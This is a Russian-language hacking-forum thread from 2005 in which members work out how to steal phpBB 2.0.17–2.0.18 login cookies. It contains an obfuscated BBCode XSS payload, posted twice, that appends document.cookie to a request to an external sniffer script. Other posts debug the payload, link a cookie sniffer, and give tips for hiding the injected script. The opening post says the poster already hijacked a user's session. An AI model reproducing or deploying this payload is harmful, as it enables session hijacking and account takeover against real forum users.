Форумы Куки в phpbb 2.0.17 - 2.0.18

Discussion in 'Уязвимости CMS/форумов' started by Manoz, 14 Nov 2005.

  1. Manoz

    Manoz Elder - Старейшина

    Joined:
    15 Feb 2005
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Отснифал кукисы, могу зайти под юзером, но есть ли возможность расшифровать пароль?

    a:2:{s:11:"autologinid";s:33:"1594701932437793947762e4.02269531";s:6:"userid";i:1161;}

    1594701932437793947762e4.02269531 - Это какой алгоритм шифрования, :confused: :confused:

    Спасибо за помощь! ;)
     
  2. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    1 person likes this.
  3. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    спасибо мне тоже это надо было =)
     
  4. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Да если не трудно, поставь весь код.
     
  5. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    Используй поиск античата.
     
  6. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
  7. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
     
  8. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&#58&#117&#114&#108&#40&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#105&#109&#97&#103&#101&#115&#91&#49&#93&#46&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#34+document.cookie;&#41&#32]wj[/url][/url]
    Ну так поможет? Подставь ; знак чтобы закрыть символ.

    А вообще, преведи результат кода который ты постишь.

    Я просто уже не знаю как его тут запостить, уже ведь и видео снял...и статью написал! :rolleyes:

    Что ещё нужно?

    Может народовский сайт создать а там в тексте мх
     
    #8 Polisos, 14 Nov 2005
    Last edited: 14 Nov 2005
  9. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
    Я убераю все плюсики, но всё равно не пашет.
     
    #9 Tem, 14 Nov 2005
    Last edited: 14 Nov 2005
  10. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    в html теги засунь.

    Нет, результат в html засунь Я ведь не вижу если просто запостишь они просто на форуме сработают!

    Покажи результат что ты делаешь, и засунь это всё так же в теги на античатовском форуме.

    Работает только в ИЕ не забывай этого.
     
    #10 Polisos, 14 Nov 2005
    Last edited: 14 Nov 2005
  11. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    Ну как как. Я те ссылку дал. Надо ; в конец специальных символов подставить.

    И да всегда пожалуйста.
     
  12. Polisos

    Polisos New Member

    Joined:
    11 Nov 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -4
    Приведи результат который ты получаешь на форуме.
     
  13. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
     
    #13 syntacsis, 18 Nov 2005
    Last edited: 18 Nov 2005
  14. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    <<YaYaYa>> , Я еще раз говорю, я не знаю как отснифать куки поэтому и прошу это подробно объяснить.
    У меня работает код алерта (исправленный). У тебя этот код работает? Что выдает форум?
     
  15. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    ну лови в личку... просто все говорят, что и код алерта не работает, а он может работать. наверно, если код воровки исправить по тому же принципу, то и он заработает? (я предполагаю)
     
    #15 syntacsis, 18 Nov 2005
    Last edited: 18 Nov 2005
  16. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Куда ставить код? Как получить куки конкретного юзера? Где они пропишутся?
    Как сам процесс идет, если код известен?
     
    #16 syntacsis, 18 Nov 2005
    Last edited by a moderator: 21 Nov 2005
  17. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    вот один из множества доступных снифферов. http://antichat.ru/sniff/
    там всё написано....
     
  18. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    <<YaYaYa>> , ты проверил с изменениями, которые я тебе в личку кинул? Работает?
    Спасибо, кстати, за объяснение. Вроде бы понял... Если что, еще спрошу.
     
  19. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Кстати небольшой совет: для дополнительной страховки задавайте строчке скрипта размер 1. Тогда ваши возможные косяки во многих случаях пройдут незамеченными
     
    #19 syntacsis, 20 Nov 2005
    Last edited by a moderator: 21 Nov 2005
  20. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    этого видео, как я понял на античате больше нет. :(
    огромная просьба, если оно где-то есть, поделиться.
    pls...